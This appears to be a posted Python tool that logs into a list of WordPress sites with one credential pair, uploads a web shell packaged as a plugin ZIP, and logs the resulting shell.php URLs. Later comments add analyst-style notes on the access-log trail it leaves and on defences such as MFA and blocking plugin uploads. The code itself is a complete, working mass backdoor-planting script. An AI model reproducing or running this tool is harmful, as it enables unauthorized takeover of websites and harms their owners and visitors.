ToKeiChun

Auto Upload Shell In CMS Wordpress (Version : 1.0)

Nov 23rd, 2020
Python 3.41 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. """
  4. Auto Upload Shell In CMS Wordpress
  5. Version : 1.0
  6. """
  7.  
  8. import re
  9. import sys
  10. import requests
  11. import argparse
  12. from random import choice
  13. from string import ascii_lowercase
  14.  
  15. # Silence urllib3's InsecureRequestWarning; the requests in this script are sent with verify=False
  16. import requests
  17. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  18. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  19.  
      # Local result logs, opened in append mode by uploadbackdoor().
      # An analyst who finds these files on a host can read them as the
      # tool's own record of the sites it was run against.
  20. logsukses = "success.txt"
  21. logfail = "failed.txt"
  22.  
      # Console prefixes built from ANSI escape codes:
      # 32;1 is bold green, 31;1 is bold red, 0 resets the colour.
  23. bener = "\033[32;1m[+]\033[0m "
  24. salah = "\033[31;1m[-]\033[0m "
  25. tambah = "\033[32;1m | \033[0m"
  26. kontl = "\033[31;1m | \033[0m"
  27.  
  28. def uploadbackdoor(host,username,password,type, agent):
          # Log in to one WordPress site with the given credentials, submit a
          # local ZIP file through the plugin-upload form, and record the
          # outcome in success.txt / failed.txt.
          #
          # Parameters:
          #   host     - base URL of the site; one trailing '/' is stripped.
          #   username - sent as the 'log' field of the wp-login.php form.
          #   password - sent as the 'pwd' field.
          #   type     - stem of the local archive (type + '.zip') that is
          #              uploaded; the name shadows the builtin `type`.
          #   agent    - sent as the User-Agent header on every request.
          #
          # Returns None. Side effects: HTTP requests through a single
          # requests.Session, console output, appended log lines.
          #
          # Request sequence as it would appear in web-server access logs:
          #   1. POST <host>/wp-login.php
          #   2. GET  <host>/wp-admin/plugin-install.php?tab=upload
          #   3. POST <host>/wp-admin/update.php?action=upload-plugin
          #      (multipart body, archive in the 'pluginzip' field)
          # All three carry the caller-supplied User-Agent and the header
          # 'Accept-Encoding: none'. The archive is named with 7 random
          # lowercase letters and the script then reports the path
          # /wp-content/plugins/<those 7 letters>/shell.php.
          #
          # NOTE(review): this flow depends on working credentials for an
          # account that may install plugins (typically an administrator) and
          # on the plugin-upload feature being enabled. Unique admin
          # passwords with MFA, setting DISALLOW_FILE_MODS in wp-config.php
          # where plugins are deployed by other means, and alerting on new
          # directories under wp-content/plugins address those preconditions.
  29.     sukses = open(logsukses, "a")  # append mode; never closed in this function
  30.     gagal = open(logfail, "a")  # append mode; never closed in this function
  31.     if host.endswith('/'):
  32.         host = host[:-1]
  33.     url = host + '/wp-login.php'
  34.     headers = {'user-agent': agent,'Accept-Encoding' : 'none'}
  35.     payload = {'log': username,'pwd': password,'rememberme': 'forever','wp-submit': 'log In','redirect_to': host + '/wp-admin/','testcookie': 1}
  36.     uploaddir = (''.join(choice(ascii_lowercase) for i in range(7)))  # 7 random lowercase letters, used as the archive name
  37.     session = requests.Session()  # one session, so cookies from the login carry to later requests
  38.     try:
  39.         r = session.post(url, headers=headers, data=payload, allow_redirects=False, verify=False, timeout=15)  # verify=False: TLS certificates are not validated
  40.         if r.status_code == 200:  # only the status code of the login POST is inspected
  41.             print(bener + host)
  42.         else:
  43.             print(salah + host)
  44.             gagal.write(host+" -> Fail Login\n")
  45.             print("\n")
  46.             pass  # no return: the plugin-install page is requested regardless of the login result
  47.         r3 = session.get(host + '/wp-admin/plugin-install.php?tab=upload',headers=headers, verify=False, timeout=12)
  48.         if r3.status_code == 200:
  49.             look_for = 'name="_wpnonce" value="'
  50.             try:
  51.                 nonceText = r3.text.split(look_for, 1)[1]
  52.                 nonce = nonceText[0:10]  # first 10 characters after the marker
  53.                 print(tambah + "WPNonce : " + nonce)
  54.             except:  # bare except: any error here is reported as a nonce failure
  55.                 print(kontl + "WPNonce : Fail Get nonce :(")
  56.                 gagal.write(host+" -> Fail Get nonce\n")
  57.                 pass
  58.            
  59.             try:
  60.                 files = {'pluginzip': (uploaddir + '.zip', open(type +'.zip', 'rb')),'_wpnonce': (None, nonce),'_wp_http_referer': (None, host + '/wp-admin/plugin-install.php?tab=upload'),'install-plugin-submit': (None,'Install Now')}
  61.                 r4 = session.post(host + "/wp-admin/update.php?action=upload-plugin",headers=headers, files=files, verify=False, timeout=30)
  62.                 if r.status_code == 200:
  63.                     print(tambah + "Success Upload Shell")
  64.                     if "Plugin installed successfully" in r4.text:
  65.                         print(tambah + "Respone : Plugin installed successfully")
  66.                     if "Destination folder already exists" in r4.text:
  67.                         print(kontl + "Respone : Destination folder already exists")
  68.                 print(tambah + "Access Shell : "+host+"/wp-content/plugins/"+uploaddir+"/shell.php")
  69.                 sukses.write(host+"/wp-content/plugins/"+uploaddir+"/shell.php\n")  # written whenever the POST above did not raise; the response body only affects console output
  70.                 print("\n")
  71.             except Exception as e:
  72.                 print(salah + host)
  73.                 print(kontl + "Error : " + str(e))
  74.                 gagal.write(host+" -> "+str(e)+"\n")
  75.                 print("\n")
  76.     except Exception as e:  # connection errors and timeouts from the first two requests land here
  77.         print(salah + host)
  78.         print(kontl + "Error : " + str(e))
  79.         gagal.write(host+" -> "+str(e)+"\n")
  80.         print("\n")
  81.  
  82. try:
          # Command-line driver. argv[1] is a text file with one site URL per
          # line; argv[2] and argv[3] are a single username/password pair that
          # is tried once against every listed site. Each site therefore sees
          # only one login attempt from a run, so per-site login rate limits
          # alone will not register it as a burst; the fixed User-Agent string
          # assigned below is the more distinctive trait in access logs.
  83.     filelist = sys.argv[1]
  84.     user = sys.argv[2]
  85.     password = sys.argv[3]
  86.    
  87.     # Do not change this configuration unless you understand it!
  88.     type = "shell" # stem of the local ZIP file that is uploaded (shell.zip); shadows the builtin `type`
  89.     ua = "Linux Mozilla 5/0"  # sent verbatim as the User-Agent on every request
  90.  
  91.     lst = open(filelist,'r')  # not closed explicitly
  92.     for i in lst.readlines():
  93.         a = i.replace('\n', '')
  94.         i = a.replace('\r','')  # strip LF then CR so each entry is a bare URL
  95.         uploadbackdoor(i,user,password,type, ua)
  96. except IOError:  # the list file could not be opened: print the usage line
  97.     print("python2 auto-upload.py sites.txt Username Password")
  98. except KeyboardInterrupt:
  99.     print("CTRL+C Detect Close Tools")
  100.     exit()
  101. except Exception as err:  # includes the IndexError raised when an argument is missing
  102.     print("Error : "+str(err))
  103.     exit()